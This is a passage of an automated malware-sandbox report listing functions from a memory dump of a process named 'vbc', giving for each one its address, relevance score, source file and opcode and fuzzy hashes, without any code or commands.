                                                                • Opcode ID: b934c4cc231a3f7141bebda51547fd62ef76d16d0fc9a7458e82c842c6bdc666
                                                                • Instruction ID: 19f5a83facb5f73f3a8e76d2e8906d3cf089a8426569ad3718ef3373f14427be
                                                                • Opcode Fuzzy Hash: b934c4cc231a3f7141bebda51547fd62ef76d16d0fc9a7458e82c842c6bdc666
                                                                • Instruction Fuzzy Hash: 6A51B372605601AFDB22EEA4C848E7BB7E9EBC9760F05062EFE40DB250D630DD05C792
                                                                Function 055FEDD3 Relevance: .2, Instructions: 166COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6e50ae21f30a97db90b362b281d76adad9605af2d642753c15bd4913f0a0e8a5
                                                                • Instruction ID: aed9aa105926da6374499325dc9534d9f0950046dcbaddde11df33c1e2579dcc
                                                                • Opcode Fuzzy Hash: 6e50ae21f30a97db90b362b281d76adad9605af2d642753c15bd4913f0a0e8a5
                                                                • Instruction Fuzzy Hash: C2518171700745AFDB34DF59D889A3BB7EEBB44319F10082EE20687A61D7B8E845CB91
                                                                Function 055FCDF0 Relevance: .2, Instructions: 165COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
                                                                • Instruction ID: dfd291aa3c2a1932e6c8334cf794f7381026a48b5ca4e57df079f96f863b97d5
                                                                • Opcode Fuzzy Hash: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
                                                                • Instruction Fuzzy Hash: 89518075E0460ADFCF14CF98C5816EDB7BAFB88300F148579D926A7350D636AE41CBA4
                                                                Function 05698DAE Relevance: .2, Instructions: 162COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bd1fcb46c9fbfd2c6334ed9fc24945c916b0dc8ecc5ce6b3dbf7334f948f154a
                                                                • Instruction ID: 90ed072c370e55939bba7e479aa4117dccbf72572d04bb2d6c09faeca1e42f9d
                                                                • Opcode Fuzzy Hash: bd1fcb46c9fbfd2c6334ed9fc24945c916b0dc8ecc5ce6b3dbf7334f948f154a
                                                                • Instruction Fuzzy Hash: D151E4726087029FDB19DF28C840BAAB7EAFF85350F04492DF98597391D734E909CB95
                                                                Function 05678350 Relevance: .2, Instructions: 161COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bd892f3a2c6259358236fc3274dea98484036befb1033a8cff25ef2f89e0aad9
                                                                • Instruction ID: a55e9ce76501579e0ec617627239a2cfaa99bfd259eccb0091ce4f1da3228d42
                                                                • Opcode Fuzzy Hash: bd892f3a2c6259358236fc3274dea98484036befb1033a8cff25ef2f89e0aad9
                                                                • Instruction Fuzzy Hash: 3951AD70A007089BD720CFA6C888A6BFBF9BF94714F10471ED19257AA1C7B0A945CB90
                                                                Function 0560E443 Relevance: .2, Instructions: 158COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bbf70120134d4f05e54af354110039d5a78794619654a43b3b4e42dbe90c4792
                                                                • Instruction ID: 71df7f24ea41809638c165463919509fb1a20aa5e7c6358dfeb84c9cea0d2c2e
                                                                • Opcode Fuzzy Hash: bbf70120134d4f05e54af354110039d5a78794619654a43b3b4e42dbe90c4792
                                                                • Instruction Fuzzy Hash: CE51A931650A15DFCB26EFA4C984EABB3BEFF44380F410869E546976A0DB31ED01CB50
                                                                Function 055FAE00 Relevance: .2, Instructions: 158COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0dd880a76b3c9ad43efb921dc5a3afa35dc6003f9888093ab0210770e1e55351
                                                                • Instruction ID: a7394cf79072f73ff7064ff76c36bc4da8cdde68a8ae476a2ec17bbed9da5694
                                                                • Opcode Fuzzy Hash: 0dd880a76b3c9ad43efb921dc5a3afa35dc6003f9888093ab0210770e1e55351
                                                                • Instruction Fuzzy Hash: 72510E36B11601EBDB269F18C884F3AB77AFF84B60F154468EA0A8F750D635DC01CB91
                                                                Function 055F45B1 Relevance: .2, Instructions: 156COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                • Instruction ID: 29b0fd1c3e8514aab4ad5fc06ed5c47b1989f06046bbc54bbc35a9a3c4d7ac33
                                                                • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                • Instruction Fuzzy Hash: A6519B71E0521AEBCF15DF94C440BEFBBB9BF85350F14406AEA01AB250E734DA45CBA0
                                                                Function 05674180 Relevance: .2, Instructions: 156COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6eec1fcd60703ccce3dc19d446083ce479183d570bf6dfeb6552661ac1c07d97
                                                                • Instruction ID: a27a3a1bcdd4d64b1a796c509de987013f0522dd52430995470e8faa45303d14
                                                                • Opcode Fuzzy Hash: 6eec1fcd60703ccce3dc19d446083ce479183d570bf6dfeb6552661ac1c07d97
                                                                • Instruction Fuzzy Hash: 405156716083099FCB54DF2AC885A6BB7E5FFC8215F44492DF89AC7250EB30D905CB96
                                                                Function 055CEFD8 Relevance: .2, Instructions: 153COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 48f2e51cbd0f1a588c4f41631a937a06312103253698f0992c48c7da54b436d9
                                                                • Instruction ID: a04163c90356e5499283d71ec11a0390e476e2d787349bde5c7d6c5ba4deaccd
                                                                • Opcode Fuzzy Hash: 48f2e51cbd0f1a588c4f41631a937a06312103253698f0992c48c7da54b436d9
                                                                • Instruction Fuzzy Hash: 78514C716083429FC310DF59D884A6BBBEAFF88754F14496DF895C7291D730E905CBA2
                                                                Function 0560CC00 Relevance: .1, Instructions: 147COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 13ce52ff0943190868daf33a0ea0431943348bb54bbf60b720e571d8ed1daabc
                                                                • Instruction ID: 05673a6b99633945d1c8eb530e13509d9adbc7898026c7079df7c7f37e4c2ed2
                                                                • Opcode Fuzzy Hash: 13ce52ff0943190868daf33a0ea0431943348bb54bbf60b720e571d8ed1daabc
                                                                • Instruction Fuzzy Hash: 4C51A730604206CAFB2CDE19C554B3BF6A6FB41265F18B72DE807CB790D631CC82EA55
                                                                Function 056001F8 Relevance: .1, Instructions: 138COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4fccece3e711c1846076f56c07d3d85dae0fd6dc834b1953325e0e1945ddd808
                                                                • Instruction ID: bfc605bfa328c5932ed23c0ff497ca3cdbc1e3563623fec9b3a68ce09f4bd594
                                                                • Opcode Fuzzy Hash: 4fccece3e711c1846076f56c07d3d85dae0fd6dc834b1953325e0e1945ddd808
                                                                • Instruction Fuzzy Hash: B941C035A00215DBCB19DFA8C444BEEB7B5BF48720F54911AE806F7780E734AC41CBA4
                                                                Function 05612750 Relevance: .1, Instructions: 137COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                • Instruction ID: 255a036bf40a4f0885ed918d9e8dbf24bddfdc492ee83337304325a8a0846dac
                                                                • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                • Instruction Fuzzy Hash: F4513975A40615DFCB15CF98C580AAEF7B2FF84710F2882A9D815EB750D734AE42CB90
                                                                Function 055D6154 Relevance: .1, Instructions: 133COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4481a136c229413c963290369ba7dd5fc91eeca194be2dd04b51c0587d7a0e0d
                                                                • Instruction ID: 15bd4a6b74b73131fa0d8adaa1a1ce308f5bdc56d8666a2fc35a61187407e6ec
                                                                • Opcode Fuzzy Hash: 4481a136c229413c963290369ba7dd5fc91eeca194be2dd04b51c0587d7a0e0d
                                                                • Instruction Fuzzy Hash: 65512671A042069BCB35CBA8CC09BB8BBB2FF45314F0442A9D41AA76D0DB349982CF94
                                                                Function 055D0D59 Relevance: .1, Instructions: 130COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d5c594c30712c787d5ce86c856397bb285c9fb155ddd067115d4d6a518cd960a
                                                                • Instruction ID: f1cd46f7e978fff90c6b00ab8cfad188b32f8814ea81486766f513d7bb3d7be0
                                                                • Opcode Fuzzy Hash: d5c594c30712c787d5ce86c856397bb285c9fb155ddd067115d4d6a518cd960a
                                                                • Instruction Fuzzy Hash: 6041A472A007189FEB31DF28C849F7AB7AAFB45714F04049AE84697290E770ED40CBA5
                                                                Function 0569866E Relevance: .1, Instructions: 129COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                • Instruction ID: 07e3ad0fbede4b76bba5eb3f035a2457cf5ae2e23a6d0165d4d40fb65868d25d
                                                                • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                • Instruction Fuzzy Hash: CF41B375B00255ABDF19DF99CC84ABFB7BEBF89210F144069E801AB741D670DE41C7A0
                                                                Function 055FA470 Relevance: .1, Instructions: 127COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7ed9838c7d7a77cade435228a30d5fd3a315f441eafd2b0b33855866650cd079
                                                                • Instruction ID: bf0133831cbe449298da8bef10e5e1659cb79a81565d40cee37e46039355262c
                                                                • Opcode Fuzzy Hash: 7ed9838c7d7a77cade435228a30d5fd3a315f441eafd2b0b33855866650cd079
                                                                • Instruction Fuzzy Hash: 0541FE32A44208CFCF15DF68C5A5BBE7BB5FF88351F041599E526AB380DB319900CBA5
                                                                Function 055CA020 Relevance: .1, Instructions: 122COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                • Instruction ID: 7a1966bde450a28a581c353800be2e44416317c8c34bd20322502cd75b54e335
                                                                • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                • Instruction Fuzzy Hash: F0414B31B08629DFDB10DEA4C444BBABFB2FB80794F1580AEE941AB340D6319D40CF91
                                                                Function 05600710 Relevance: .1, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                • Instruction ID: 9a98917a0eadf5aa2882f1dd021a0a0c14fea11aee44c046abefbf5c9cbbf85a
                                                                • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                • Instruction Fuzzy Hash: 1C412675A04605EFCB28CF98C988BAAB7F9FF08710B50496DE556D7690D330EA45CF90
                                                                Function 055D262C Relevance: .1, Instructions: 119COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 302ca99cb309c791c2fbb7538d6826ee57328d40427106810f9357aca53c7cf7
                                                                • Instruction ID: a0f61336e1d5e2619f4fb39ad39073ea87ab1f3d5f39d6818e2e3c8b386c4189
                                                                • Opcode Fuzzy Hash: 302ca99cb309c791c2fbb7538d6826ee57328d40427106810f9357aca53c7cf7
                                                                • Instruction Fuzzy Hash: 6A41AE7A601704DFCB75EF68C944A69FBB2FF84310F1486ADD4069B6A0DB31A942CF61
                                                                Function 056507C3 Relevance: .1, Instructions: 114COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cab30c2292a1349f658db97da3fbc8052d17244d59df1092f0130816b3dc5c36
                                                                • Instruction ID: 9737b391789247dba582a29a295160b3ee0bf017147d8893050baae3dbd67858
                                                                • Opcode Fuzzy Hash: cab30c2292a1349f658db97da3fbc8052d17244d59df1092f0130816b3dc5c36
                                                                • Instruction Fuzzy Hash: DD416E716043059BD760DF25C849FABBBE8FF88764F104A2EF99897250DB70D904CB96
                                                                Function 056A2E4F Relevance: .1, Instructions: 112COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 81a04aa6e8f716182105713d3f190816b803b6ed99c1f7ed8e7a94d59025a880
                                                                • Instruction ID: 9e034ebfcc886a92ed4072fbf943ca237685b2b5831deff6614ee2356db11347
                                                                • Opcode Fuzzy Hash: 81a04aa6e8f716182105713d3f190816b803b6ed99c1f7ed8e7a94d59025a880
                                                                • Instruction Fuzzy Hash: 18415076A40109EFCB15CF98C990AAEB7B5FF84754F248069E915AB341D731EE81CF90
                                                                Function 056505A7 Relevance: .1, Instructions: 111COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 165c2631213f76ddca523655da14195d6f2c3c34df69f2180dd000f0b5795f37
                                                                • Instruction ID: 3a2f88129324b6b4294d4e2be47f285feb961279e0b8257c433414ff81019617
                                                                • Opcode Fuzzy Hash: 165c2631213f76ddca523655da14195d6f2c3c34df69f2180dd000f0b5795f37
                                                                • Instruction Fuzzy Hash: 7D41C2726486469FC320DF69C844A7AB7E9BFC8720F140A1DF89597780E730E944C7A9
                                                                Function 055C80A0 Relevance: .1, Instructions: 111COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 32a47975ba100be74401f77415ce435ee09f56a94418835ed5dd19e33998fd55
                                                                • Instruction ID: 5db47ac968fb1852a8e0bd2b6f41931c7cf8f778038bd584e6f471dd8a670797
                                                                • Opcode Fuzzy Hash: 32a47975ba100be74401f77415ce435ee09f56a94418835ed5dd19e33998fd55
                                                                • Instruction Fuzzy Hash: 4341B172A05616AFCB10DF98C940AA9BBF2FF84760F1486ADD816A7690D734ED41CBD0
                                                                Function 055C8CD0 Relevance: .1, Instructions: 107COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bb6b26922c146146c718470c9833d674ed676926e0aac3456fcbe5411f001e2a
                                                                • Instruction ID: 3a8764341b0b4ca3374afe1429be5b813b168dc7e38bbba6b737e153efbf9792
                                                                • Opcode Fuzzy Hash: bb6b26922c146146c718470c9833d674ed676926e0aac3456fcbe5411f001e2a
                                                                • Instruction Fuzzy Hash: 6D31DA72A04215DFCB21DF98C940A6EFBF2FF95324F1449AED456AB290DB35AD01CB90
                                                                Function 055E02E1 Relevance: .1, Instructions: 106COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                • Instruction ID: e6e2f37d02f782ebf43f4251d9b9b95d0e3830339df53b444ebec85bbb535be1
                                                                • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                • Instruction Fuzzy Hash: B3310C32604244AFDB25DB68CC48BEEFBE9FF44350F0445A5E455D73A1D6B4D844CBA4
                                                                Function 0567E3DB Relevance: .1, Instructions: 105COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f0f34a545993532a99fb59fae7b82e2cba9451b5f019738411ea674832f93073
                                                                • Instruction ID: 2dc9455cd87fb75f3f6b53b184a9ca4fb54f130daac459133832704f2d6bbfb5
                                                                • Opcode Fuzzy Hash: f0f34a545993532a99fb59fae7b82e2cba9451b5f019738411ea674832f93073
                                                                • Instruction Fuzzy Hash: 6E31C635B5070AABDB22DF658C45F6F7BA9AF88B50F000168F600AB394DAA5DC05C7A4
                                                                Function 055D4260 Relevance: .1, Instructions: 102COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c8c9a75f6f8b1eacdb095fabdd61d54e14f31633563d236e55b35cb3dc7c3a7f
                                                                • Instruction ID: 8779f1360c80e003c5bd030f32be88b59c95d950a632f3d4aa006ba4253aef7b
                                                                • Opcode Fuzzy Hash: c8c9a75f6f8b1eacdb095fabdd61d54e14f31633563d236e55b35cb3dc7c3a7f
                                                                • Instruction Fuzzy Hash: 95419F32200B45DFCB32CF28C489BAAB7E5BF45714F044829E95A8B650CB74F844CBA0
                                                                Function 05670DF0 Relevance: .1, Instructions: 101COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f7347ad76c9c86dc65c89daed89238317501206b72f65cd682cfb8c4669e39ed
                                                                • Instruction ID: 003b67b7cc3ed55219a6673615b1d633d041a177905c3a7acd1af1b19e5dc267
                                                                • Opcode Fuzzy Hash: f7347ad76c9c86dc65c89daed89238317501206b72f65cd682cfb8c4669e39ed
                                                                • Instruction Fuzzy Hash: F231C472609349AFD726DB24C809E6BBBA8EF80660F04496DF89197250E670ED05CFB5
                                                                Function 056961C3 Relevance: .1, Instructions: 97COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7263dff66af8534a944f6feac8f2f27918ae6b685156972888cdd711c59b991e
                                                                • Instruction ID: d290d59189ecbbce02d3c9ee2505352b59dedd2760d667a74251715c38efbc02
                                                                • Opcode Fuzzy Hash: 7263dff66af8534a944f6feac8f2f27918ae6b685156972888cdd711c59b991e
                                                                • Instruction Fuzzy Hash: CB31B275A00219ABDB29DFA8C944FBEF7B9FB44740F554169E801AB244D770ED01CBA4
                                                                Function 055D07AF Relevance: .1, Instructions: 95COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1c8f97f24a19e0f4c9d0f15edd99983e0ea8ef7ca1a7dd0d028b08167e382e54
                                                                • Instruction ID: e3017c85d7ad122980b7d1176cd7d361a0776f89b02085df43922d4f44c02af0
                                                                • Opcode Fuzzy Hash: 1c8f97f24a19e0f4c9d0f15edd99983e0ea8ef7ca1a7dd0d028b08167e382e54
                                                                • Instruction Fuzzy Hash: F3319373A04652DBC722DE688858D7BFBA6BFC4650F014929EC59A7360EA30DC01C7F1
                                                                Function 056960B8 Relevance: .1, Instructions: 95COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bce9c6c60dbbd10216d99071cd47fc6564938d6c1ead2ae89ac7223956ac07b0
                                                                • Instruction ID: 8be7452f36d43fee097d2cf933c5386c33c711ffbcb05ccc62384de4adbd87a4
                                                                • Opcode Fuzzy Hash: bce9c6c60dbbd10216d99071cd47fc6564938d6c1ead2ae89ac7223956ac07b0
                                                                • Instruction Fuzzy Hash: 1131C071B40706ABDF2ADFA9C850B7EBBAEAF84354F0040AAE505DB351DA70DC01CB90
                                                                Function 055D8550 Relevance: .1, Instructions: 94COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6de3fe457a4709de793ce740ac6072c563b43ef414867e47fb786d689c33acca
                                                                • Instruction ID: a37c3cf0e53701116000371c0894464304b5cfe8477e2af8f5e0fa8eb09c93c6
                                                                • Opcode Fuzzy Hash: 6de3fe457a4709de793ce740ac6072c563b43ef414867e47fb786d689c33acca
